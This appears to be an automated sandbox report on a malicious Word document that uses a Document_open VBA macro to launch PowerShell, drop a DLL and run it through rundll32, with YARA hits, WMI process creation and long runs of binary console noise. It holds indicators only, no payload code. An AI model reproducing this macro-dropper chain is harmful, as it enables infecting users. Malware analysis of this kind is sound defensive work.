Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00257AE4 11_2_00257AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00269AE2 11_2_00269AE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025B0E1 11_2_0025B0E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026A2EA 11_2_0026A2EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025D2CE 11_2_0025D2CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025DEC9 11_2_0025DEC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002668CB 11_2_002668CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002676D5 11_2_002676D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002612D1 11_2_002612D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025E924 11_2_0025E924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025792C 11_2_0025792C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025BB28 11_2_0025BB28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00265D36 11_2_00265D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00260705 11_2_00260705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00255D0E 11_2_00255D0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00268313 11_2_00268313
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00262513 11_2_00262513
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00265B60 11_2_00265B60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00268978 11_2_00268978
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00252746 11_2_00252746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00263745 11_2_00263745
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00256342 11_2_00256342
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00258F55 11_2_00258F55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026C95E 11_2_0026C95E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025DB5B 11_2_0025DB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002581A0 11_2_002581A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025B3A2 11_2_0025B3A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002567AC 11_2_002567AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00253FAB 11_2_00253FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025FFB5 11_2_0025FFB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026CBB0 11_2_0026CBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002559B8 11_2_002559B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025EF80 11_2_0025EF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00258994 11_2_00258994
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00253B97 11_2_00253B97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0026B19F 11_2_0026B19F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002639E1 11_2_002639E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002533F4 11_2_002533F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025B7F8 11_2_0025B7F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0025C3C2 11_2_0025C3C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00216C05 13_2_00216C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00216E8A 13_2_00216E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00214121 13_2_00214121
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022533C 13_2_0022533C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021FB04 13_2_0021FB04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00219716 13_2_00219716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021E360 13_2_0021E360
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00225748 13_2_00225748
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00224DAD 13_2_00224DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022C19B 13_2_0022C19B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022A7E4 13_2_0022A7E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002183F0 13_2_002183F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00214828
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00211600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00223600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00213618
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00225060
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00220C65
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021D668
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021766F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021F471
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00221C79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021427A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00228E79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00222A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021D04B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021884A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00227A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00220EA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021C8A5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002272AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002112B6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00216ABA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022D08F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022A094
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021F099
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00229AE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021B0E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00217AE4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022A2EA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021DEC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002268CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021D2CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002212D1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002276D5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021E924
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021BB28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021792C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00225D36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00220705
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00215D0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00228313
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00222513
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00225B60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00228978
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00216342
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00212746
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00223745
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00218F55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021DB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022C95E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00214D5F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002181A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021B3A2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00213FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002167AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022CBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021FFB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002159B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021EF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00218994
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00213B97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022B19F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002239E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_002133F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021B7F8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0021C3C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E6C05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E6E8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E9716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001EFB04
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F533C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E4121
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F5748
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001EE360
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FC19B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F4DAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E83F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001FA7E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E3618
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E1600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F3600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E4828
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F7A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E884A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001ED04B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F2A7D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E427A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F1C79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001F8E79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001EF471
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001E766F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001ED668
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Informacion_4-09757.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module R4bm01nsbtdt1, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Informacion_4-09757.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1000B078 appears 46 times
Yara signature match
Source: 00000005.00000002.2095452042.0000000001C04000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000005.00000002.2095324924.00000000001E6000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Yvtlx6p4.dll.5.dr Static PE information: Section: .rsrc ZLIB complexity 0.999343417553
Source: rundll32.exe, 00000006.00000002.2102053701.0000000001AE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2099969121.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2100149332.0000000001D70000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@28/9@1/4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: CreateServiceW, 11_2_002545C3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$formacion_4-09757.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC706.tmp
Source: Informacion_4-09757.doc OLE indicator, Word Document stream: true
Source: Informacion_4-09757.doc OLE document summary: title field not present or empty
Source: Informacion_4-09757.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\msg.exe Console Write: ............?........................... .].......].....................................#...............................h.......5kU.............
Source: C:\Windows\System32\msg.exe Console Write: ............?...H...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.......8.......L.......................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ........................................................................`I.........v.....................K........c.............................
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................!..j......................A.............}..v......y.....0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................!..j..... A...............A.............}..v....P.y.....0.l...............c.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v......y.....0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......c...............A.............}..v......y.....0.l...............c.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............Q..j......................A.............}..v....P.{.....0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#...............Q..j..... A...............A.............}..v......{.....0.l.............h.c.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j.....Hc...............A.............}..v....P.......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....7..................j......................A.............}..v............0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j.....Hc...............A.............}..v....P.......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....C..................j......................A.............}..v............0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j.....Hc...............A.............}..v....P.......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....O..................j......................A.............}..v............0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.l.............8Ec.....(.......H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....[..................j....X.................A.............}..v............0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.5.2.2.............}..v............0.l.............8Ec.....$.......H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....g..................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....s..................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................E./........................j......................A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j..... ................A.............}..v.... !......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....Hc...............A.............}..v.....'......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'..................j.....(................A.............}..v.... )......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j.....Hc...............A.............}..v...../......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3..................j.....0................A.............}..v.... 1......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j.....Hc...............A.............}..v.....7......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?..................j.....8................A.............}..v.... 9......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j......................A.............}..v.....?......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K..................j.....@................A.............}..v.... A......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....Hc...............A.............}..v.....G......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W..................j.....H................A.............}..v.... I......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.....Hc...............A.............}..v.....O......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c..................j.....P................A.............}..v.... Q......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....Hc...............A.............}..v.....W......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o..................j.....X................A.............}..v.... Y......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j......................A.............}..v....._......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j.....`................A.............}..v.... a......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v.....g......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....h................A.............}..v.... i......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v.....o......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....p................A.............}..v.... q......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v.....w......0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....x................A.............}..v.... y......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v.... .......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................A.............}..v............0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j.....Hc...............A.............}..v............0.l.............................H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....#..................j....x.................A.............}..v............0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j.....Hc...............A.............}..v....H.......0.l.....................r.......H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v..../..................j......................A.............}..v............0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;....... ..........j.....Hc...............A.............}..v............0.l.............8Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....;..................j......................A.............}..v....H.......0.l..............Ec.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E.................A.............}..v....x.......0.l...............c.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E.................A.............}..v............0.l...............c.............H...............
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
